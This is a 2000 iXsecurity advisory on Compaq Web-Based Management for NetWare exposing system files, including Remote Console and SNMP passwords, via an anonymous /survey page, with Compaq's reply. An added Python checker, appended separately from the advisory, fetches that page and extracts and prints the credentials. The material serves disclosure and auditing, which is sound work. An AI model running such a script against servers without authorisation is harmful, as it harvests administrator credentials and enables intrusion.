Title: Compaq Web-Based Management on a Netware server reveals sensitive system files
Released by: iXsecurity
Date: 7th November 2000
iXsecurity Security Vulnerability Report

No: iXsecurity.20001107.compaq-wbm.a

====================================

Vulnerability Summary
---------------------

Problem:  The default installation of Compaq Web-Based
          Management on a Netware server reveals
          sensitive system files

Threat:   Anyone that has access to port 2301 on a
          Netware server can read the system
          password (Remote Console password)

Platform: Compaq Web-Based Management on Netware
          (Software version 2.28 verified)

Solution: Disable the Web Agent

Vulnerability Description
-------------------------

http://netware.server.with.CWBM:2301/survey is
accessible for everyone by default and contains
sensitive system files:

SYS:\SYSTEM\AUTOEXEC.NCF
SYS:\ETC\NETINFO.CFG

The system password (Remote Console password)
and other passwords (SNMP ControlCommunity)
may be in clear text in any of these files.

Solution
--------

Compaq recommends that you disable the web agent
until a resolution has been provided.

Additional Information
----------------------

Many administrators install Compaq Web-Based Management
by default when they are installing Netware on a Compaq
machine. Web-Based Management listens on port 2301 and
anonymous access is allowed by default. iXsecurity has
to point out that none of our customers had changed
any Compaq user password until the first audit report
arrived.

Some Compaq installations have ports 49400 and 49401 open
too. These ports are not verified.

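The following checker is an added example, not part of the iXsecurity advisory or of Compaq's software. It does what the Vulnerability Description and Additional Information sections describe by hand: it probes ports 2301, 49400 and 49401, fetches /survey anonymously from port 2301, and scans the returned text for the NetWare directives that carry the credentials the advisory names. The directive formats it looks for (LOAD REMOTE <password>, the -E encrypted-password form, and ControlCommunity= / MonitorCommunity= / TrapCommunity= on the SNMP load line) are assumptions based on standard NetWare console syntax; the advisory itself only states that the passwords "may be in clear text". The sample /survey body embedded for offline use is constructed, not captured from a real server.

```python
"""Check a NetWare server for the Compaq Web-Based Management /survey exposure.

Added example, not code from the advisory or from Compaq.  Directive syntax
(LOAD REMOTE, LOAD SNMP ...Community=) is assumed from standard NetWare usage.
"""
import re
import socket
import sys
import urllib.request

SURVEY_PORT = 2301
EXTRA_PORTS = (49400, 49401)   # listed in the advisory as open but unverified

# AUTOEXEC.NCF line that loads the Remote Console module.  Assumed syntax:
#   LOAD REMOTE <password>        clear-text RCONSOLE password
#   LOAD REMOTE -E <encrypted>    encrypted form (still worth reporting)
# [ \t] rather than \s so a bare "LOAD REMOTE" does not swallow the next line.
RCONSOLE_RE = re.compile(r"^[ \t]*LOAD[ \t]+REMOTE[ \t]+(-E[ \t]+)?(\S+)", re.I | re.M)

# SNMP community strings on the LOAD SNMP line (AUTOEXEC.NCF or NETINFO.CFG).
COMMUNITY_PATTERNS = {
    "snmp_control_community": re.compile(r"ControlCommunity\s*=\s*(\S+)", re.I),
    "snmp_monitor_community": re.compile(r"MonitorCommunity\s*=\s*(\S+)", re.I),
    "snmp_trap_community":    re.compile(r"TrapCommunity\s*=\s*(\S+)", re.I),
}

# Constructed sample of what /survey may return; not real server output.
SAMPLE_SURVEY = r"""
Compaq Survey Utility output (constructed sample, not real server data)
--- SYS:\SYSTEM\AUTOEXEC.NCF ---
SET TIME ZONE = CET-1CEST
FILE SERVER NAME NW_SRV1
LOAD REMOTE s3cret
LOAD RSPX
LOAD SNMP ControlCommunity=private MonitorCommunity=public
--- SYS:\ETC\NETINFO.CFG ---
LOAD SNMP ControlCommunity=private
"""


def find_credentials(text):
    """Return {finding_name: [values...]} for every credential-bearing directive."""
    found = {}
    for m in RCONSOLE_RE.finditer(text):
        key = "rconsole_password_encrypted" if m.group(1) else "rconsole_password"
        found.setdefault(key, []).append(m.group(2))
    for name, pattern in COMMUNITY_PATTERNS.items():
        values = pattern.findall(text)
        if values:
            found[name] = values
    return found


def port_open(host, port, timeout=3):
    """True if a TCP connect to host:port succeeds within the timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def fetch_survey(host, timeout=10):
    """Fetch /survey with no credentials; None if the request fails."""
    url = "http://%s:%d/survey" % (host, SURVEY_PORT)
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.read().decode("latin-1", errors="replace")
    except (OSError, ValueError):
        return None


def main(argv):
    if len(argv) != 2:
        print("usage: %s <netware-host>" % argv[0])
        return 2
    host = argv[1]
    for port in (SURVEY_PORT,) + EXTRA_PORTS:
        state = "open" if port_open(host, port) else "closed/filtered"
        print("port %d: %s" % (port, state))
    body = fetch_survey(host)
    if body is None:
        print("no anonymous /survey on %s:%d" % (host, SURVEY_PORT))
        return 1
    creds = find_credentials(body)
    if not creds:
        print("/survey is anonymous but no credential directives matched")
        return 1
    for name, values in sorted(creds.items()):
        print("%s: %s" % (name, ", ".join(values)))
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it as `python3 survey_check.py netware.server.with.CWBM`. An exit status of 0 means /survey was served without authentication and at least one credential-bearing directive was found; the port lines for 49400 and 49401 only report reachability, since the advisory does not say what those services are.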

Vendor response
---------------

Mr. Vitek,

This is a known issue with an advisory available on the Compaq website as
indicated below:

http://www5.compaq.com/products/servers/management/security.html

Until a resolution has been provided, it would be recommended that you
disable the web agents as indicated in that advisory.

Thank You,
Compaq eServices
TRACKING NUMBER: A00000367277-00001144068
---------------

//Ian Vitek
mailto:ian.vitek@ixsecurity.com

-------------------------------
iXsecurity (former Infosec) is a Swedish and United
Kingdom based tiger team that has worked with computer-related
security since 1982 and done technical security
audits (pentests) since 1996. iXsecurity is now searching
for co-workers in Sweden and UK.
Call Stafferod for more information
tel: +46-8-6621070
mailto:christer.stafferod@ixsecurity.com